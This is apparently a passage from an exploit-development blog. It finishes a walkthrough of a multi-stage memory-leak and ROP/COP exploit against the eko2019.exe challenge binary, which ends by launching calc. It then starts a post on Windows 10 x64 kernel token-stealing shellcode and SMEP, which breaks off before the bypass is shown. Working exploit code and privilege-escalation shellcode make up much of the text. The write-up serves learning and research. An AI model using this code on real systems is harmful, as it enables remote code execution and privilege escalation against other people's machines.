This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a fourth request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction set- because that opcode doesn’t create a valid set of opcodes with said move instruction.

Investigating a little bit more, we can recall that our move instruction also ends with a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX onto the stack (which is a stack pivot ROP gadget). Pushing an item on the stack, will actually load said item into RSP! This means that we can load our own ROP gadget into RSP, and then execute the ret instruction to leave the function- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first two requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SH_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will be actually peforming a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value, will give us the base adddress of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One things to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straight forward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SH_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our prgram doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute on our next pop rax gadget, which loads the value of “calc” into RAX (null terminated). 636c6163 = clac in hex to text. This is because we are compensating for the endianness of our processor (little endian).

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and point the address in RCX to it.

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is a far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As apart of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process, only run in context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?” Especially, if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debugee machine (see my post on setting up a debugging enviornment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200)

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

As you can see, the result is 7. This is not the value we want- it is actually the inverse of it. Logic tells us, we should take the inverse of 0xf, -0xf.

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Openenig a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s Use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is ran from). From there, we could spawn cmd.exe from (and in context) of our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcessId() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProgress() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current threads _ETHREAD structure. As a point of contention, know that _KTHREAD is the first entry in _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax,0B8h]

RAX alread contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current proccess is! The PID for the current process at this time is the SYSTEM process (PID = 4). This is subject to change dependent on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly, is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveLinkProcess element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out , in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the regsiter for the error code. NTSTATUS, when a value of 0 is returned, means the operations successfully performed.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and the call it from the kernel. This means the user mode code will be called in context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

